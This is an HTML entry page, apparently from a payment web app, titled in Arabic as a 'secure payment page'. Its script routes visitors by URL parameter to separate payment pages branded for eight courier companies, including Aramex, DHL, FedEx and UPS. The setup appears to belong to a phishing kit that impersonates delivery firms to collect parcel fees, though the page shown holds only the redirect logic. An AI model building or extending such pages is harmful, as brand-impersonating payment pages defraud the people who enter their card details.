<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>صفحة دفع آمنة - نظام دفع محمي</title>
    <meta name="description" content="صفحة دفع آمنة ومحمية - أكمل الدفع بشكل آمن وموثوق" />
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Almarai:wght@300;400;700;800&display=swap" rel="stylesheet">
    <meta property="og:title" content="صفحة دفع آمنة - نظام دفع محمي" />
    <meta property="og:description" content="صفحة دفع آمنة ومحمية - أكمل الدفع بشكل آمن وموثوق" />
    <meta property="og:image" content="/og-aramex.jpg" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta name="twitter:image" content="/og-aramex.jpg" />
</head>
<body>
    <div id="root" style="text-align: center; padding: 100px 20px; font-family: 'Almarai', sans-serif;">
        <h1>صفحة دفع آمنة</h1>
        <p>جاري التحميل...</p>
    </div>
    
    <script>
        // Get service from URL params or default to aramex
        const urlParams = new URLSearchParams(window.location.search);
        const service = urlParams.get('service') || 'aramex';
        
        // Extract pay ID from path
        const path = window.location.pathname;
        const payMatch = path.match(/\/pay\/([^\/\?]+)/);
        const payId = payMatch ? payMatch[1] : '';
        
        // Supported services mapping
        const services = {
            'aramex': 'aramex.html',
            'fedex': 'fedex.html',
            'dhl': 'dhl.html',
            'ups': 'ups.html',
            'smsa': 'smsa.html',
            'zajil': 'zajil.html',
            'naqel': 'naqel.html',
            'empost': 'empost.html'
        };
        
        // Redirect to the correct service
        const targetFile = services[service] || 'aramex.html';
        if (payId) {
            window.location.href = `/pay/${payId}/recipient?service=${service}`;
        } else {
            window.location.href = targetFile;
        }
    </script>
    
    <script type="module" src="/src/main.tsx"></script>
</body>
</html>
